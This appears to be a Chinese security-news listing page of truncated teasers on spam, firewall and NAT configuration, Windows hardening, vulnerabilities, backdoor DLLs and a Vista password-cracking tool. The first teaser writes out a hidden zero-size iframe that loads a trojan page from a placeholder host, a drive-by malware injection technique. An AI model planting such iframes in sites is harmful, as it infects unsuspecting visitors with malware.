一、最简单的也是最有效的 iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 二、JS挂马 iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> ...

垃圾邮件的来历和技术根源SMTP协议本身是一个简化的邮件递交协议，缺乏很多必要的身份认证，这是SMTP协议造成垃圾邮件泛滥的原因之一。由于SMTP协议中，允许发信人伪造绝大多数的发信人特征信息，如：发信人、信件路由等，甚至在通过匿名转发、开放转发和开放代理等手段后，可以近乎完全的抹去垃圾邮件的发信人特征。目前，绝大多数的垃圾邮件都伪造了其真实的发信来源，这对于发现制止垃圾邮件的传播造成了很大的困难...

你会走上一座由软件开发商建造的桥梁吗？反正我是不会的。而Oracle的首席安全官（CSO）Mary Ann Davidson也不会。据报道，于前不久在爱丁堡举行的WWW2006会议上，Davidson承认了一个我们当中许多人知晓已久的事实：整个软件行业都无法向用户提供完全安全可靠的软件系统。 Davidson还说到，越来越多的CSO认为开发商对软件安全性持有一种懈怠的态度，因此确立一些规章来督促...

在局域网内的某台PC感染病毒，它会发起大量的连接，迅速消耗路由器资源，导致路由器效率下降，影响其他用户使用。NAT限制最大连接数可以避免出现这种情况。通过连接数限制功能，可以设置某种特征的连接数上限，从而可以实现NAT限制最大连接数的功能。配置如下：# 创建ACL并配置规则，来匹配源IP地址为192.168.1.2/24的数据。 system-view[Quidway] acl number 20...

企业在实施身份管理技术的时候往往会面临很多挑战。例如，一家公司可能会根据个人编号、明确的姓名或电子邮件地址来识别其员工。然而，只是识别这些标识符的类型就是一个相当困难的事情，有时根本是不可能的，而且要想为它们提供支持还需要高昂成本。 结构化数据标准促进组织（OASIS）开发了一种统一的标识符方案，可帮助企业解决今天越来越棘手的身份管理互用性问题。可扩展资源标识符（XRI）规范建立了一种互...

多家安全公司与团体指出，这个攻击程序钻的是芯片制造商Broadcom驱动程序的安全漏洞，由于Broadcom的驱动程序用来启动Windows电脑内建的无线网络硬件，受影响的机器可能多达数百万台，包括惠普、戴尔、Gateway、eMachines等公司出厂的电脑在内。 赛门铁克(Symantec)13日对DeepSight订户发出安全通告说，问题发生在不当处理无线网络服务名称，也就是“服务识别码”(...

Cisco PIX 506E防火墙是应用极为广泛的Cisco PIX 506防火墙的增强版本，可以通过一个可靠的、强大的安全设备为远程办公室和分支机构提供企业级的安全性。Cisco PIX 506E防火墙是市场领先的Cisco PIX防火墙系列的一部分，可以通过一个经济有效的、高性能的解决方案提供丰富的安全功能和强大的远程管理功能，尤其适用于为远程/分支机构保障互联网连接。PIX 506E还提...

1、禁止IPC空连接 Cracker可以利用net use命令建立空连接，进而入侵，还有net view，nbtstat这些都是基于空连接的，禁止空连接就好了。打开注册表，找到Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把这个值改成”1”即可。 2、禁止At命令 Cracker往往给你个木马然...

有些企业内部使用固定IP地址，例如ISP发放公网IP区域、DMZ的服务器、开放一对一NAT的服务器等，由于需要对互联网上用户开放服务，必须使用固定IP。公开虽然有好处，但相对的也容易成为恶意人士攻击的目标，因此若是企业网络有这样配置的服务器或是计算机，就必须先加以保护。要保护公网IP服务器或是计算机，第一个要作的就是除了保留要提供服务的TCP/UDP端口，之外的网络端口全部封掉，以避免服务器受到攻...

将杀毒软件升级到最新也不能查杀，打开浏览器，上网搜索，发现也有朋友中了这种木马，但该网友提供的方法并不能删除木马，无奈之下只好自己“动手”了，以下就是我的整个手工清除木马的过程，写出来与大家分享。 具体的不知道从哪天起，我的Maxthon浏览器好像不能拦截一些网站的广告了，屏幕的右下角也不时的出现如QQ广告一样的东西，一开始以为是网站和QQ的广告。但越用越不对劲，仔细一看，右下角的根本就不是Q...

苹果发布了一款补丁软件，修正了其最新的AirPort Extreme基站（base station）产品中的两个缺陷。苹果在一份安全公告中说，补丁软件“收紧”了支持802.11n 标准的AirPort Extreme 基站的缺省配置。苹果说，这一补丁软件还修正了会泄露与该设备相连的有密码保护的硬盘上文件名字的缺陷。 苹果基站的缺省配置允许进入的IPv6连接。苹果说，这会将与该设备相连的主机上的...

微软可能对部分警察举行一次培训，向他们传授下一代操作系统Vista PC客户版密码的破解方法。 据英国一媒体报道，上述消息来自英国议会一下下属委员会会议。在此次会议上，剑桥大学教授罗斯-安德森表示，如果议会的确在考虑对警官进行Vista 操作系统解密培训的计划，那么宜早不宜迟。出于打击恐怖活动和抓捕恐怖分子的需要，警方需要进入部分PC的硬盘存储系统，掌握相关线索，因此突破密码防护非常必要。 ...

XML安全厂商Forum Systems公司上月在安全问题上提出了一个警告，他认为，随着越来越多的Ajax风格的应用出现，很多组织需要考虑潜在的安全缺陷以及性能问题。位于盐湖城的Forum Systems公司的市场副总裁Walid Negm说:“我们并非在制造警告。我们只是感到需要让人们考虑安全和可扩展性需求。我们始终在关注使用XML的技术。这是我们份内的事。”Aja...

对于企业来说，信息无疑是最大的财富。随着病毒的泛滥和黑客的猖獗加剧，企业网络安全防护受到了极大的关注。起初，人们把更多的精力放在如何提升单一设备和单一技术的安全防护性能上，而后，人们开始意识到作为网络骨干设备的企业交换机在企业网络安全防护的部署中其实发挥着更重要的作用。在交换机上采取必要的安全技术不仅可以有效缓解其他安全设备的工作压力，而且还能更及时发现并解决问题。 例如，防病毒软件在蠕虫病毒面...

　　安全顾问时常会提出许多保护网络与数据安全的经验，但在安全领域里，有些点子不但没什么帮助，甚至会适得其反。本文总结出了十条“计算机安全陋习”，希望大家看看自己犯了其中哪些错误，有则改之，无则加冕。　　陋习一、一旦发现安全漏洞就赶紧购买新软件试图补救，过于依赖和相信安全软件产品而缺乏自己动手和分析的能力　　现在信息安全领域有个很流行但实际上很危险的思想，即相信所有问...

微软用户要有心理准备：另一波安全更新又将来袭。 微软计划在本周二发布每月例行的安全更新程序，这回将提供12项安全通告，附带修补软件弱点的更新程序。其中九项安全通告针对Windows操作系统的问题，另两项与Office有关，其余一项则解决Exchange电子邮件服务器软件的瑕疵。 微软8日在网站上贴出公告说，其中至少一项Windows弱点和一项Office弱点被视为“重大”（critical...

前言   后门！相信这个词语对您来说一定不会陌生，它的危害不然而欲，但随着人们的安全意识逐步增强，又加上杀毒软件的"大力支持"，使传统的后门无法在隐藏自己，任何稍微有点计算机知识的人，都知道"查端口""看进程"，以便发现一些"蛛丝马迹"。所以，后门的编写者及时调整了思路，把目光放到了动态链接程序库上，也就是说，把后门做成DLL文件，然后由某一个EXE做为载体，或者使用Rundll32...

498)this.style.width=498;' onmousewheel = 'javascript:return big(this)' height=167 alt="" src="/files/uploadimg/20070511/141702162.jpg" width=450 border=0> a. 假设你已经通过串口初始化了防火墙4000（配置接口IP、G...

近日，网络上正在悄悄地蔓延着一款工具软件，是由一个名为Account Reset Console的系统破解类软件，该软件目前最新版本为V4.50。国内部分vista论坛和个人的Vista站点介绍，该软件可以破解掉Windows Vista和Windows Server 2008测试版操作系统的帐户密码。 此类站点宣称该软件是“全球首个支持Windows Vista密码重置的软件”，同时支持Wi...

防火墙典型的设置是有两个网卡，一个流入，一个流出。iptables读取流入和流出的数据包的报头，然后将它们与规划集(ruleset)相比较，然后将可接受的数据包从一个网卡转发至另外一个网卡。对于被拒绝的数据包，可以被丢弃或者按照你所定义的方式来处理。通过向防火墙提供有关对来自某个源、到某个目的地或具有特定协议类型的信息包要做些什么的指令的规则，控制信息包的过滤。通过使用iptables系统提供的特...

498)this.style.width=498;' onmousewheel = 'javascript:return big(this)' height=163 alt="" src="http://images.51cto.com/files/uploadimg/20051020/1723220.jpg" width=201 border=0> Cisco Secure PIX防火墙535...

在浏览网页的时候半天不出，以为是死机了，晕，原来是插件，晕！ 所以有高手开始屏蔽插件，下面是我学习过程中的一些注册表 文件代码。 对付3721： REGEDIT5 #B83FC273-3522-4CC6-92EC-75CC86678DA4 /3721 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Comp...

QoS带宽管理是网管在管理网络中一种必不可少的手段，可以有效地提高带宽的使用率，特别是针对企业的关键应用，使之得到优先的带宽保证，但是一般的带宽管理存在一定的不足，往往造成两个问题： 1.一条QoS规则所预留的带宽只能让使用该QoS规则的所有用户共享，而无法直接针对每一用户做个别的带宽分配，因而往往造成僧多粥少的情况。 2.为了解决第1.点的问题，QoS规则则必须改变为＂针对每一用户做细部规划...

信息提供： 安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别： 共同体串信息泄露漏洞 攻击类型： 远程攻击 发布日期： 2004-06-22 更新日期： 2004-06-28 受影响系统： BT Voyager 2000 Wireless ADSL Router 安全系统： ...

Internet的飞速发展，为信息的传播和利用带来了极大的方便，同时也使人类社会面临着信息安全的巨大挑战。为了应对日益严重的信息安全问题，防火墙、入侵检测、安全审计、流量监控等安全产品逐步得到推广和应用。这些安全产品从一定程度上缓解了日益紧迫的安全问题，但如何集成各个产品的优点，更好地发挥安全产品的作用，是网络管理人员面临的新问题。概括起来，在目前的网络安全管理中存在以下问题：1．各安全设备往往是...